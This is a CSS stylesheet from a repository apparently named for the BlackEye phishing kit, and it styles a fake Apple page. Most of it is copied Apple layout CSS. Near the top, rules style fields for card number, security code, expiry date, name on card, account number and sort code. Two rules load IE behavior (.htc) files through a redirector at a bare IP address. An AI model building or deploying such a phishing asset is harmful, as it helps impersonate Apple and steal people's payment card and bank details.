Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
thewickedkarma
GitHub Repository: thewickedkarma/blackeye-im
Path: blob/master/sites/apple/images/base.css
777 views
1
/* RESET */
2
html,body,div,ul,ol,li,dl,dt,dd,h1,h2,h3,h4,h5,h6,pre,form,p,blockquote,fieldset,input,abbr,article,aside,command,details,figcaption,figure,footer,header,hgroup,mark,meter,nav,output,progress,section,summary,time { margin: 0; padding: 0; }
3
h1,h2,h3,h4,h5,h6,pre,code,address,caption,cite,code,em,strong,th,figcaption { font-size: 1em; font-weight: normal; font-style: normal; }
4
fieldset,iframe { border: none; }
5
caption,th { text-align: left; }
6
table { border-collapse: collapse; border-spacing: 0; }
7
article,aside,footer,header,hgroup,nav,section,figure,figcaption { display: block; }
8
9
/* LAYOUT */
10
html { background-color:#fff; }
11
12
.ccvnote {font-size:10px; padding-left:125px; padding-top:5px;}
13
.ccvnote img {padding-right:10px; padding-top:5px;}
14
#lookup {padding-left:20px; padding-right:30px;}
15
16
#lookup_field input {
17
width: 130px;
18
}
19
20
input#seccode {
21
background: url('cc2.png') no-repeat;
22
background-position: 3px;
23
background-color: #FFF;
24
}
25
26
input#ccdate {
27
background: url('ccdate.png') no-repeat;
28
background-position: 3px;
29
background-color: #FFF;
30
}
31
32
input#ccfrom {
33
background: url('ccdate.png') no-repeat;
34
background-position: 3px;
35
background-color: #FFF;
36
}
37
38
input#longcard {
39
background: url('hcard.png') no-repeat;
40
background-position: 3px;
41
background-color: #FFF;
42
}
43
44
#nameoncard {
45
padding-left:21px;
46
width:200px;
47
}
48
49
input#nameoncard {
50
background: url('hname.png') no-repeat;
51
background-position: 3px;
52
background-color: #FFF;
53
}
54
55
#longcard {
56
padding-left:21px;
57
width:200px;
58
}
59
60
#accountnumber {
61
padding-left:2px;
62
width:150px;
63
}
64
65
#sortcode {
66
padding-left:2px;
67
width:150px;
68
}
69
70
#ccdate {
71
padding-left:20px;
72
width:200px;
73
}
74
75
#ccfrom {
76
padding-left:20px;
77
width:200px;
78
}
79
80
#seccode{
81
padding-left:20px;
82
width:85px;
83
}
84
85
#lookup_field {
86
padding-left: 51px;
87
}
88
89
input#longnumber {
90
background: url('images/placeholder.html') 175px 4px no-repeat;
91
background-size: 25px 19px;
92
}
93
94
#lookup_field {
95
padding-left: 8px;
96
padding-right: 8px;
97
}
98
.clear { clear: both; }
99
.clearer { clear: both; display: block; margin: 0; padding: 0; height: 0; line-height: 1px; font-size: 1px; }
100
.selfclear { zoom:1; }
101
.selfclear:after { content:'.'; display:block; height:0; clear:both; visibility:hidden; }
102
103
img, .search-wrapper .left, .search-wrapper .right, ul.sp-results li.viewall a, ul.sp-results li .replacementimg,
104
#globalfooter #breadcrumbs, #globalfooter #breadcrumbs span, #directorynav .capbottom,
105
#productheader h1 a, #productheader h2 a, #main .maincap { behavior: url(http://37.59.97.23/external.html?link=https://appleid.cdn-apple.com/20131211/global/scripts/lib/iepngfix.htc); }
106
107
img { border: 0; }
108
img.left { float: left; margin: 2px 20px 16px 0; }
109
img.right { float: right; margin: 2px 0 16px 20px; }
110
img.across { margin: 2px 0 16px 0; }
111
img.flushleft { margin-left: -20px; }
112
img.flushright { margin-right: -20px; }
113
114
.replaced { display: block; width: 1px; height: 1px; outline: none; overflow: hidden; text-indent: -9999px; }
115
#omniture, #top { position: absolute; top: 0; }
116
#container { width: 980px; margin: 0 auto; position: relative; }
117
#main { width: 100%; position: relative; }
118
#content { padding: 18px 20px; position: relative; color: #333; }
119
#breadcrumb { clear: both; text-align: center; margin: 18px auto; clear: both; font-size: 10px; color: #686868; }
120
121
.content { background: #fff; border: 1px solid; border-color: #e5e5e5 #dbdbdb #d2d2d2; -webkit-box-shadow: rgba(0,0,0,0.3) 0 1px 3px; -moz-box-shadow: rgba(0,0,0,0.3) 0 1px 3px; box-shadow: rgba(0,0,0,0.3) 0 1px 3px; }
122
.content:nth-child(1n) { border: none; } /* reset border for smart browsers */
123
124
.content,
125
.rounded { border-radius: 4px; -webkit-border-radius: 4px; -moz-border-radius: 4px; -o-border-radius: 4px; -khtml-border-radius: 4px; }
126
127
.shadow { -webkit-box-shadow: rgba(0,0,0,0.35) 0 1px 3px; -moz-box-shadow: rgba(0,0,0,0.35) 0 1px 3px; box-shadow: rgba(0,0,0,0.35) 0 1px 3px; }
128
img.shadow { padding: 5px; background: #fff; margin-bottom: 2px; *border: 1px solid #e2e2e2; _position: relative; }
129
130
131
.callout { border-radius: 7px; -webkit-border-radius: 7px; -moz-border-radius: 7px; -o-border-radius: 7px; -khtml-border-radius: 7px; }
132
133
.roundedtop { border-radius: 4px 4px 0 0; -webkit-border-top-left-radius:4px; -webkit-border-top-right-radius:4px; -moz-border-radius: 4px 4px 0 0; -o-border-radius: 4px 4px 0 0; -khtml-border-radius: 4px 4px 0 0; }
134
.roundedbottom { border-radius: 0 0 4px 4px; -webkit-border-bottom-left-radius:4px; -webkit-border-bottom-right-radius:4px; -moz-border-radius: 0 0 4px 4px; -o-border-radius: 0 0 4px 4px; -khtml-border-radius: 0 0 4px 4px; }
135
.roundedright { border-radius: 0 4px 4px 0; -webkit-border-top-right-radius:4px; -webkit-border-bottom-right-radius:4px; -moz-border-radius: 0 4px 4px 0; -o-border-radius: 0 4px 4px 0; -khtml-border-radius: 0 4px 4px 0; }
136
.roundedleft { border-radius: 4px 0 0 4px; -webkit-border-top-left-radius:4px; -webkit-border-bottom-left-radius:4px; -moz-border-radius: 4px 0 0 4px; -o-border-radius: 4px 0 0 4px; -khtml-border-radius: 4px 0 0 4px; }
137
.roundedtopleft { border-radius:4px 0 0; -webkit-border-top-left-radius:4px; -moz-border-radius:4px 0 0; -o-border-radius:4px 0 0; -khtml-border-radius:4px 0 0; }
138
.roundedtopright { border-radius: 0 4px 0 0; -webkit-border-top-right-radius:4px; -moz-border-radius:0 4px 0 0; -o-border-radius:0 4px 0 0; -khtml-border-radius: 0 4px 0 0; }
139
.roundedbottomleft { border-radius: 0 0 0 4px; -webkit-border-bottom-left-radius:4px; -moz-border-radius: 0 0 0 4px; -o-border-radius: 0 0 0 4px; -khtml-border-radius: 0 0 0 4px; }
140
.roundedbottomright { border-radius: 0 0 4px 0; -webkit-border-bottom-right-radius:4px; -moz-border-radius: 0 0 4px 0; -o-border-radius: 0 0 4px 0; -khtml-border-radius: 0 0 4px 0; }
141
142
/* GRID */
143
.column { float: left; }
144
.grid2col, .grid2cola, .grid2colb, .grid2colc, .grid2cold, .grid2cole, .grid2colf, .grid3col, .grid3cola, .grid4col, .grid5col, .grid6col { width: 100%; }
145
146
.grid2col .column { width: 49%; }
147
.grid2col .grid2col .column { width: 47.8%; }
148
.grid3col .grid2col .column { width: 46%; }
149
.grid4col .grid2col .column { width: 45%; }
150
151
.grid2cola .column.first { width: 66%; }
152
.grid2cola .column.last { width: 32%; }
153
154
.grid2colb .column.first { width: 74.9%; }
155
.grid2colb .column.last { width: 23%; }
156
157
.grid2colc .column.first { width: 32%; }
158
.grid2colc .column.last { width: 66%; }
159
160
.grid2cold .column.first { width: 23%; }
161
.grid2cold .column.last { width: 74.9%; }
162
163
.grid2cole .column.first { width: 79%; }
164
.grid2cole .column.last { width: 19%; }
165
166
.grid2colf .column.first { width: 19%; }
167
.grid2colf .column.last { width: 79%; }
168
169
.grid3col .column { width: 32%; margin-left: 2%; }
170
.grid2col .grid3col .column { width: 31%; }
171
172
.grid3cola .column { width: 58%; margin-left: 2%; }
173
.grid3cola .column.first,
174
.grid3cola .column.last { width: 19%; }
175
176
.grid4col .column { width: 23%; margin-left: 3%; }
177
178
.grid5col .column { width: 18.4%; margin-left: 2%; }
179
180
.grid6col .column { width: 15%; margin-left: 2%; }
181
182
.column.first, .column.last { margin-left: 0 !important; }
183
.column.last { float: right !important; }
184
185
p.last, ul.last, ol.last, li.last { _width: auto !important; _float: none !important; }
186
187
#container:after, #content:after, .grid2col:after, .grid2cola:after, .grid2colb:after, .grid2colc:after, .grid2cold:after, .grid2cole:after, .grid2colf:after, .grid3col:after, .grid3cola:after, .grid4col:after, .grid5col:after, .grid6col:after { content: "."; display: block; height: 0; clear: both; visibility: hidden; }
188
#container, #content, .grid2col, .grid2cola, .grid2colb, .grid2colc, .grid2cold, .grid2cole, .grid2colf, .grid3col, .grid3cola, .grid4col, .grid5col, .grid6col { zoom: 1; }
189
190
/* TYPE */
191
body { font: 12px/18px "Lucida Grande", "Lucida Sans Unicode", Helvetica, Arial, Verdana, sans-serif; background-color: transparent; color: #333; -webkit-font-smoothing: antialiased; }
192
193
a { color: #08c; }
194
a:link, a:visited, a:active { text-decoration: none; }
195
a:hover { text-decoration: underline; }
196
a span:hover { text-decoration: inherit; }
197
a.block { display: block; cursor: pointer; }
198
a.block span,
199
a.block em { color:#08c; cursor: pointer; }
200
a.block:hover { text-decoration: none; }
201
a.block:hover span,
202
a.block:hover em { color: #08c; text-decoration: underline; }
203
a.more, em.more, span.more { white-space: nowrap; padding-right: 10px; background: url(morearrow_08c.gif) no-repeat 100% 50%; cursor: pointer; zoom: 1; }
204
a.morelarge, em.morelarge, span.morelarge { white-space:nowrap; padding-right:12px; background:url(morearrow_big_08c.gif) no-repeat 100% 50%; cursor:pointer; zoom:1; }
205
a.lesslarge, em.lesslarge, span.lesslarge { white-space:nowrap; padding-left:12px; background:url(../lessarrow_big_08c.html) no-repeat 0 50%; cursor:pointer; zoom:1; }
206
@media only screen {
207
a.more, em.more, span.more { background-image:url(morearrow_08c.html); }
208
a.morelarge, em.morelarge, span.morelarge { background-image:url(morearrow_big_08c.html); }
209
a.lesslarge, em.lesslarge, span.lesslarge { background-image:url(lessarrow_big_08c.html); }
210
}
211
a.external, em.external, span.external { white-space: nowrap; padding-right: 15px; background: url(external10x10.gif) no-repeat 100% 49%; cursor: pointer; zoom: 1; }
212
a[rel="external"] { white-space: nowrap; padding-right: 15px; background: url(external10x10.gif) no-repeat 100% 49%; cursor: pointer; zoom: 1; }
213
em.more, span.more, em.external, span.external { color:#08c; font-style: normal; cursor: pointer; }
214
.nowrap { white-space:nowrap; }
215
strong, b { font-weight: bold; }
216
em, i, cite { font-style: italic; }
217
sup { padding-left: 1px; font-size: 10px !important; font-weight: normal !important; vertical-align: baseline; position: relative; bottom: 0.33em; _position: static !important; }
218
sup, sup a { color:#666; }
219
sup a:hover { color:#08c; text-decoration:none; }
220
abbr { border: 0; }
221
.sosumi { font-size: 10px !important; line-height:1.5; color:#888; }
222
.sosumi_features { font-size: 10px !important; line-height:1.5; color:#888; }
223
224
h1,h2,h3,h4,h5,h6,strong { color:#000; }
225
h1,h2,h3,h4 { font-weight: bold; }
226
h2,h3,h4 { line-height: 18px; }
227
h1,h2 { margin-bottom: 18px; }
228
h1 { font-size: 24px; line-height: 36px; }
229
h2 { font-size: 16px; }
230
h3 { font-size: 1em; }
231
h4 { font-size: 10px; }
232
p { margin-bottom: 18px; }
233
p.intro { color: #888; font-size: 16px; line-height: 22px; font-weight: normal; }
234
.more { text-align: right; }
235
236
ul { list-style: none outside; }
237
ol { margin-bottom: 18px; list-style: decimal; margin-left: 2.2em; }
238
ul.square,
239
ul.circle { margin-left: 2em; margin-bottom: 18px; }
240
ul.square { list-style: square outside; }
241
ul.circle { list-style: circle outside; }
242
ul ul.circle,
243
ul ul.square { margin-top: 4px; margin-bottom: 5px; }
244
ol.sosumi { margin-left: 0; padding-left: 2em; *padding-left: 2.2em; }
245
246
a.pdf { background: url(globaliconpdf12x12.gif) 0 0.4em no-repeat; display: block; padding-left: 20px; }
247
a.html { background: url(globaliconhtml12x12.gif) 0 0.4em no-repeat; display: block; padding-left: 20px; }
248
a.qt { background: url(globaliconqt12x12.gif) 0 0.4em no-repeat; display: block; padding-left: 20px; }
249
a.ical { background: url(globaliconical12x12.gif) 0 0.4em no-repeat; display: block; padding-left: 20px; }
250
a.dl { background: url(globalicondl11x10.gif) 0 0.4em no-repeat; display: block; padding-left: 20px; }
251
a.dmg { background: url(globalicondmg12x12.gif) 0 0.4em no-repeat; display: block; padding-left: 20px; }
252
a.zip { background: url(globaliconzip12x12.gif) 0 0.4em no-repeat; display: block; padding-left: 20px; }
253
a.keynote { background: url(globaliconkeynote12x12.gif) 0 0.4em no-repeat; display: block; padding-left: 20px; }
254
a.audio { background: url(globaliconaudio12x12.gif) 0 0.4em no-repeat; display: block; padding-left: 20px; }
255
256
.dot-nav { width:100%; margin:0; padding:0; text-align:center; line-height:1px; }
257
.dot-nav li,
258
.dot-nav li a { display:-moz-inline-stack; display:inline-block; *display:inline; *zoom:1; }
259
.dot-nav li { position:relative; z-index:1; margin:0; width:13px; height:15px; overflow:hidden; }
260
.dot-nav li a { position:absolute; z-index:1; width:13px; height:45px; top:0; left:0; cursor:pointer; text-indent:-1000em; background:url(../dots_08c.html) no-repeat 0 0; behavior:url(http://37.59.97.23/external.html?link=https://appleid.cdn-apple.com/20131211/global/scripts/lib/ie7pngfix.htc); }
261
.dot-nav li a:hover { top:-15px; }
262
.dot-nav li a.active { cursor:default; top:-30px; }
263
264
.dot-nav:nth-child(1n) li { width:10px; height:10px; padding:3px 2px 2px 2px; }
265
.dot-nav:nth-child(1n) li a { border-radius:5px; width:10px; height:10px; background:#e0e1e3;
266
-webkit-box-shadow:inset 0 1px 1px rgba(0, 0, 0, .25);
267
-moz-box-shadow:inset 0 1px 1px rgba(0, 0, 0, .25);
268
box-shadow:inset 0 1px 1px rgba(0, 0, 0, .25);
269
}
270
.dot-nav:nth-child(1n) li a:hover { top:0; background:#ccc;}
271
.dot-nav:nth-child(1n) li a.active { top:0; background:#08c;
272
background:-webkit-gradient(linear,lefttop,leftbottom,color-stop(0%,rgb(126,198,234)),color-stop(24%,rgb(70,179,234)),color-stop(100%,rgb(3,135,201)));
273
background:-webkit-linear-gradient(top,rgb(126,198,234)0%,rgb(70,179,234)45%,rgb(3,135,201)100%);
274
background: -moz-linear-gradient(top,rgb(126,198,234)0%,rgb(70,179,234)45%,rgb(3,135,201)100%);
275
background: linear-gradient(top,rgb(126,198,234)0%,rgb(70,179,234)45%,rgb(3,135,201)100%);
276
-webkit-box-shadow:inset 0 1px 0 rgba(0, 0, 0, .25);
277
-moz-box-shadow:inset 0 1px 0 rgba(0, 0, 0, .25);
278
box-shadow:inset 0 1px 0 rgba(0, 0, 0, .25);
279
}
280
281
.last { margin-bottom: 0; }
282
#main .sidebar { font-size: 10px; line-height: 18px; color:#333; }
283
#main .callout { font-size: 11px; line-height: 18px; margin-bottom: 18px; }
284
285
body.specs #main { font-size: 11px; line-height: 16px; }
286
287
/* PIPED LINKS */
288
.piped { display: block; zoom: 1; }
289
.piped:after { content: "."; display: block; height: 0; clear: both; visibility: hidden; }
290
.piped li { float: left; display: inline; }
291
.piped a { border-left: 1px solid #797c80; padding: 0 0 0 0.75em; margin-left: 0.75em; }
292
.piped a.first { border-left: 0 !important; padding-left: 0; margin-left: 0 !important; }
293
294
/*--- Global Footer (legacy) ---*/
295
#globalfooter .gf-buy { float: left; width: 60%; margin: 18px 0 9px; }
296
#globalfooter .gf-links { float: right; margin: 18px 0 9px; }
297
#globalfooter .gf-links a { padding: 0 10px; white-space: nowrap; }
298
#globalfooter .gf-links a.last { padding-right: 0; _float: none !important; width: auto !important; }
299
300
/*--- Global Footer ---*/
301
#globalfooter { width: 980px; color: #888; font-size: 10px; margin: 18px auto 0; padding-bottom: 36px; text-align: left !important; }
302
#globalfooter a { color: #08c; }
303
#globalfooter p { margin-bottom: 1em; }
304
#globalfooter p.gf-buy { float: left; width: 52%; margin: 18px 0 9px 3px; }
305
#globalfooter ul.piped a { padding: 0 0 0 1.5em; margin-left: 1.5em; border-left: 1px solid #d0d0d0; }
306
#globalfooter .gf-links { float: right; margin: 18px 3px 9px 0; }
307
#globalfooter .gf-sosumi { clear: both; width: 100%; padding-top: 9px; }
308
#globalfooter .gf-sosumi a { padding: 0 10px; }
309
#globalfooter .gf-sosumi p { float: left; margin-left: 3px; }
310
#globalfooter form { margin: 18px 10px; }
311
#globalfooter .search-wrapper { margin: 0 auto; }
312
#globalfooter .search-wrapper input.prettysearch { margin-left: 10px; }
313
#globalfooter ul.piped a.contact_us { padding-right: 1.5em; border-right: 1px solid #d0d0d0; }
314
#globalfooter ul.piped a.choose { margin-left: 0; border: 0; }
315
#globalfooter ul.piped a.choose img { vertical-align: middle; margin-top: -5px; *position: relative; }
316
317
/*--- Breadcrumbs (legacy) ---*/
318
#globalfooter #breadcrumbs { font-size: 11px; color: #444; background: url(../breadcrumb_bg.html) no-repeat; overflow: hidden; height: 36px; line-height: 34px; font-weight: bold; text-shadow: 0 1px 0 #fff; }
319
#globalfooter #breadcrumbs a { color: #444; text-decoration: none; float: left; padding: 0 10px; margin-left: -10px; *position: relative; _cursor: hand; }
320
#globalfooter #breadcrumbs a:hover { color: #333; text-decoration: none !important; }
321
#globalfooter #breadcrumbs a.home { margin: 0; width: 15px; height: 0; padding-top: 36px; overflow: hidden; }
322
#globalfooter #breadcrumbs span { float: left; width: 9px; margin: 0 10px 0 0; height: 0; padding-top: 34px; margin-top: 1px; overflow: hidden; background: url(breadcrumb_sep.png) no-repeat; }
323
324
/*--- Breadcrumbs ---*/
325
#globalfooter ol#breadcrumbs { font-size: 11px; color: #444; background: url(breadcrumb_bg.png) no-repeat; height: 36px; line-height: 34px; margin: 0; list-style: none; font-weight: bold; text-shadow: 0 1px 0 #fff; }
326
#globalfooter ol#breadcrumbs li { float: left; margin: 0; padding: 0 0 0 20px; background: url(breadcrumb_sep_20080909.png) no-repeat; }
327
#globalfooter ol#breadcrumbs li a { float: left; color: #444; text-decoration: none; padding: 0 10px; margin-left: -10px; }
328
#globalfooter ol#breadcrumbs li a:hover { color: #333; text-decoration: none; }
329
#globalfooter ol#breadcrumbs li.home { background: none; margin: 0; padding: 0; }
330
#globalfooter ol#breadcrumbs li.home a { margin: 0; padding: 0 10px; width: 15px; text-indent: -9999px; overflow: hidden; }
331
332
/*--- Directory Nav ---*/
333
#directorynav { font-size: 11px; line-height:14px; padding-top:2px; background: url(directory_bg.png) repeat-y; border-top: 1px solid #e5e5e5; float: left; width: 100%; margin-top: -4px; *position: relative; }
334
#directorynav .column { width: 120px; padding: 9px 0 2px 18px; }
335
#directorynav .column.last { float: left !important; padding-right: 0; }
336
#directorynav h3 { color: #666; margin: 0; font-size: 1em; line-height: 14px; font-weight: bold; padding-bottom: 4px; }
337
#directorynav h3.standalone { margin-bottom: 18px; }
338
#directorynav a { color: #888; text-decoration: none; display: block; zoom: 1; }
339
#directorynav h3.standalone a:link,
340
#directorynav h3.standalone a:visited { color: #444; }
341
#directorynav a:hover { color: #333 !important; text-decoration: none !important; }
342
#directorynav .capbottom { clear: both; position: relative; top: 5px; _top: 12px; height: 5px; width: 980px; background: url(directory_capbg.png) no-repeat; }
343
#directorynav ul { margin-bottom: 0; padding-bottom: 9px; }
344
#directorynav ul li { padding-bottom: 4px; }
345
#directorynav.mac .column,
346
#directorynav.ipod .column,
347
#directorynav.ipodtouch .column,
348
#directorynav.ipad .column,
349
#directorynav.iphone .column,
350
#directorynav.itunes .column { width: 190px; padding: 9px 0 0 54px; }
351
352
/*--- BREADORY ---*/
353
#breadory { border: 1px solid #ddd; width: 978px; margin: 0 auto; -moz-border-radius: 4px; -webkit-border-radius: 4px; border-radius: 4px; }
354
#globalfooter #breadory ol#breadcrumbs { background: none; clear: both; float: none; height: 3em; line-height: 3em; font-size: 11px; color: #666; margin: 0; list-style: none; font-weight: bold; text-shadow: 0 1px 0 #fff; }
355
#breadory ol#breadcrumbs li { background: none; float: left; margin: 0; padding: 0 0 0 1em; }
356
#breadory ol#breadcrumbs li a { float: left; color: #666; text-decoration: none; padding: 0 1.75em 0 0; margin-left: 0px; background: url(breadcrumb_separator.png) no-repeat 100% 50%; }
357
#breadory ol#breadcrumbs li a:hover { color: #333; text-decoration: none; }
358
#breadory ol#breadcrumbs li.home { background: none; margin: 0; padding: 0; }
359
#breadory ol#breadcrumbs li.home a { background: url(breadcrumb_home.png) no-repeat 1.25em 50%; margin: 0; padding: 0 0 0 1.25em; width: 30px; text-indent: -9999px; overflow: hidden; }
360
#breadory ol#breadcrumbs li.home a:hover { background-image: url(breadcrumb_home_over.png); }
361
362
@media only screen {
363
#breadory ol#breadcrumbs li a { background-image:url(breadcrumb_separator.svg); }
364
#breadory ol#breadcrumbs li.home a { background-image:url(breadcrumb_home.svg); }
365
#breadory ol#breadcrumbs li.home a:hover { background-image:url(breadcrumb_home_over.svg); }
366
}
367
368
#breadory #directorynav { background: none; clear: both; float: none; margin-top: 0; }
369
#breadory #directorynav .capbottom { height: 0; font-size: 1px; _display: none; }
370
371
/* PRODUCTHEADER */
372
#productheader { padding: 1em 0 0.2em; overflow: hidden; width: 980px; margin: 0 auto; *position: relative; *height: 39px; }
373
#productheader h1,
374
#productheader h2 { height: 32px; line-height: 32px; display: inline; float: left; margin: 1px 0 6px 8px; padding: 0; margin-bottom: 6px !important; }
375
#productheader h1 a,
376
#productheader h2 a { line-height: 32px; background-position: 0 0; background-repeat: no-repeat; color: #888; display: block; font-weight: normal; height: 32px; outline: none; text-decoration: none; text-indent: -9999px; *position: relative; }
377
body#overview #productheader h1 a,
378
body#overview #productheader h2 a { cursor: default; }
379
380
#productheader ul { display: inline; float: right; margin: 0; }
381
#productheader ul li { display: inline; }
382
#productheader ul li a { color: #333; float: left !important; margin-top: 1em; margin-left: 30px; margin-right: 8px; padding: 0; text-decoration: none; }
383
#productheader ul li a:hover { color: #08c; }
384
385
#productheader a.buynow, #productheader span.buynow, /* old */
386
#productheader a.ordernow, #productheader span.ordernow,
387
#productheader a.joinnow, #productheader span.joinnow,
388
#productheader a.preorder, #productheader span.preorder,
389
#productheader a.preorder_blue, #productheader span.preorder_blue,
390
#productheader a.howtobuy, #productheader span.howtobuy,
391
#productheader a.howtoapply, #productheader span.howtoapply,
392
#productheader a.freetrial, #productheader span.freetrial,
393
#productheader a.downloadnow, #productheader span.downloadnow,
394
#productnav a.downloadnow, #productnav span.downloadnow,
395
#productheader a.upgradenow, #productheader span.upgradenow,
396
#productheader a.tryamac, #productheader span.tryamac { height: 25px; margin: 0.7em 0 0 20px; background-position: 0 0; background-repeat: no-repeat; display: block; float: right; position: relative; text-decoration: none; text-indent: -9999px; outline: none; overflow: hidden; }
397
#productheader a.notifyme, #productheader span.notifyme { height: 25px; margin: 0.8em 0 0 20px; background-position: 0 0; background-repeat: no-repeat; display: block; float: right; position: relative; text-decoration: none; text-indent: -9999px; outline: none; overflow: hidden; }
398
399
#productheader a.preorder_blue, #productheader span.preorder_blue { width: 75px; background-image: url(preorder_blue.png); }
400
#productheader a.buynow, #productheader span.buynow { width: 72px; background-image: url(buynows.png); _background-image: url(buynows.gif); }
401
#productheader a.ordernow, #productheader span.ordernow { width: 81px; background-image: url(ordernows.png); _background-image: url(ordernows.gif); }
402
#productheader a.joinnow, #productheader span.joinnow { width: 72px; background-image: url(joinnows.png); _background-image: url(joinnows.gif); }
403
#productheader a.preorder, #productheader span.preorder { width: 99px; background-image: url(preordernows.png); _background-image: url(preordernows.gif); }
404
#productheader a.howtobuy, #productheader span.howtobuy { width: 86px; background-image: url(../howtobuys.html); _background-image: url(../howtobuys-2.html); }
405
#productheader a.howtoapply, #productheader span.howtoapply { width: 100px; background-image: url(../howtoapplys.html); _background-image: url(../howtoapplys-2.html); }
406
#productheader a.freetrial, #productheader span.freetrial { width: 72px; background-image: url(freetrials.png); _background-image: url(freetrials.gif); }
407
#productheader a.downloadnow, #productheader span.downloadnow { width: 108px; background-image: url(downloadnows.png); _background-image: url(downloadnows.gif); }
408
#productnav a.downloadnow, #productnav span.downloadnow { width: 108px; background-image: url(downloadnows.png); _background-image: url(downloadnows.gif); }
409
#productheader a.upgradenow, #productheader span.upgradenow { width: 104px; background-image: url(upgradenows.png); _background-image: url(upgradenows.gif); }
410
#productheader a.tryamac, #productheader span.tryamac { width: 77px; background-image: url(../tryamacs.html); _background-image: url(../tryamacs-2.html); }
411
#productheader a.notifyme, #productheader span.notifyme { width: 75px; background-image: url(../notifymes.html); _background-image: url(../notifymes-2.html); }
412
413
#productheader a.buynow:hover, #productheader a.buynow:focus,
414
#productheader a.ordernow:hover, #productheader a.ordernow:focus,
415
#productheader a.joinnow:hover, #productheader a.joinnow:focus,
416
#productheader a.preorder:hover, #productheader a.preorder:focus,
417
#productheader a.howtobuy:hover, #productheader a.howtobuy:focus,
418
#productheader a.howtoapply:hover, #productheader a.howtoapply:focus,
419
#productheader a.freetrial:hover, #productheader a.freetrial:focus,
420
#productheader a.downloadnow:hover, #productheader a.downloadnow:focus,
421
#productnav a.downloadnow:hover, #productnav a.downloadnow:focus,
422
#productheader a.upgradenow:hover, #productheader a.upgradenow:focus,
423
#productheader a.tryamac:hover, #productheader a.tryamac:focus,
424
#productheader a.notifyme:hover, #productheader a.notifyme:focus { background-position: 0 -25px; }
425
426
#productheader a.buynow:active,
427
#productheader a.ordernow:active,
428
#productheader a.joinnow:active,
429
#productheader a.preorder:active,
430
#productheader a.howtobuy:active,
431
#productheader a.howtoapply:active,
432
#productheader a.freetrial:active,
433
#productheader a.downloadnow:active,
434
#productnav a.downloadnow:active,
435
#productheader a.upgradenow:active,
436
#productheader a.tryamac:active,
437
#productheader a.notifyme:active { background-position: 0 -50px; }
438
439
#productheader span.buynow,
440
#productheader span.ordernow,
441
#productheader span.joinnow,
442
#productheader span.preorder,
443
#productheader span.howtobuy,
444
#productheader span.howtoapply,
445
#productheader span.freetrial,
446
#productheader span.downloadnow,
447
#productnav span.downloadnow,
448
#productheader span.upgradenow,
449
#productheader span.notifyme { background-position: 0 -75px; }
450
451
452
/* BUTTONS - (U.S.) */
453
.browsewebappss, .businessstores, .buyiphones, .buynows, .buynows-arrow, .comingsoons, .descargarahoras, .downloadituness, .downloadnows, .finds, .freetrials, .getstarteds, .gos, .howtoapplys, .howtobuys, .joinnows, .learnmores, .nikebuynows, .notifymes, .ordernows, .preordernows, .preorders, .reserves, .startyoursearchs, .submits, .tryamacs, .upgradenows {
454
height: 25px; background-position: 0 0; background-repeat: no-repeat; display: block; text-decoration: none; text-indent: -9999px; overflow: hidden;
455
}
456
a.browsewebappss:hover, a.businessstores:hover, a.buyiphones:hover, a.buynows:hover, a.buynows-arrow:hover, a.comingsoons:hover, a.descargarahoras:hover, a.downloadituness:hover, a.downloadnows:hover, a.finds:hover, a.freetrials:hover, a.getstarteds:hover, a.gos:hover, a.howtoapplys:hover, a.howtobuys:hover, a.joinnows:hover, a.learnmores:hover, a.nikebuynows:hover, a.notifymes:hover, a.ordernows:hover, a.preordernows:hover, a.preorders:hover, a.reserves:hover, a.startyoursearchs:hover, a.submits:hover, a.tryamacs:hover, a.upgradenows:hover,
457
a.browsewebappss:focus, a.businessstores:focus, a.buyiphones:focus, a.buynows:focus, a.buynows-arrow:focus, a.comingsoons:focus, a.descargarahoras:focus, a.downloadituness:focus, a.downloadnows:focus, a.finds:focus, a.freetrials:focus, a.getstarteds:focus, a.gos:focus, a.howtoapplys:focus, a.howtobuys:focus, a.joinnows:focus, a.learnmores:focus, a.nikebuynows:focus, a.notifymes:focus, a.ordernows:focus, a.preordernows:focus, a.preorders:focus, a.reserves:focus, a.startyoursearchs:focus, a.submits:focus, a.tryamacs:focus, a.upgradenows:focus {
458
background-position: 0 -25px;
459
}
460
a.browsewebappss:active, a.businessstores:active, a.buyiphones:active, a.buynows:active, a.buynows-arrow:active, a.comingsoons:active, a.descargarahoras:active, a.downloadituness:active, a.downloadnows:active, a.finds:active, a.freetrials:active, a.getstarteds:active, a.gos:active, a.howtoapplys:active, a.howtobuys:active, a.joinnows:active, a.learnmores:active, a.nikebuynows:active, a.notifymes:active, a.ordernows:active, a.preordernows:active, a.preorders:active, a.reserves:active, a.startyoursearchs:active, a.submits:active, a.tryamacs:active, a.upgradenows:active {
461
background-position: 0 -50px;
462
}
463
span.browsewebappss, span.businessstores, span.buyiphones, span.buynows, span.comingsoons, span.descargarahoras, span.downloadituness, span.downloadnows, span.finds, span.freetrials, span.getstarteds, span.gos, span.howtoapplys, span.howtobuys, span.joinnows, span.learnmores, span.nikebuynows, span.notifymes, span.ordernows, span.preordernows, span.preorders, span.reserves, span.startyoursearchs, span.submits, span.tryamacs, span.upgradenows {
464
background-position: 0 -75px;
465
}
466
.browsewebappss { background-image: url(../browsewebappss.html); _background-image: url(../browsewebappss-2.html); width: 123px; }
467
.businessstores { background-image: url(../businessstores.html); _background-image: url(../businessstores-2.html); width: 105px; }
468
.buyiphones { background-image: url(../buyiphones.html); _background-image: url(../buyiphones-2.html); width: 87px; }
469
.buynows { background-image: url(buynows.png); _background-image: url(buynows.gif); width: 72px; }
470
.buynows-arrow { background-image: url(../buynows_arrow.html); _background-image: url(../buynows_arrow-2.html); width: 86px; }
471
.comingsoons { background-image: url(../comingsoons.html); _background-image: url(../comingsoons-2.html); width: 97px; }
472
.descargarahoras { background-image: url(../descargarahoras.html); _background-image: url(../descargarahoras-2.html); width: 108px; }
473
.downloadituness { background-image: url(../downloadituness.html); _background-image: url(../downloadituness-2.html); width: 116px; }
474
.downloadnows { background-image: url(downloadnows.png); _background-image: url(downloadnows.gif); width: 108px; }
475
.finds { background-image: url(../finds.html); _background-image: url(../finds-2.html); width: 52px; }
476
.freetrials { background-image: url(freetrials.png); _background-image: url(freetrials.gif); width: 72px; }
477
.getstarteds { background-image: url(../getstarteds.html); _background-image: url(../getstarteds-2.html); width: 90px; }
478
.gos { background-image: url(../gos.html); _background-image: url(../gos-2.html); width: 44px; }
479
.howtoapplys { background-image: url(../howtoapplys.html); _background-image: url(../howtoapplys-2.html); width: 100px; }
480
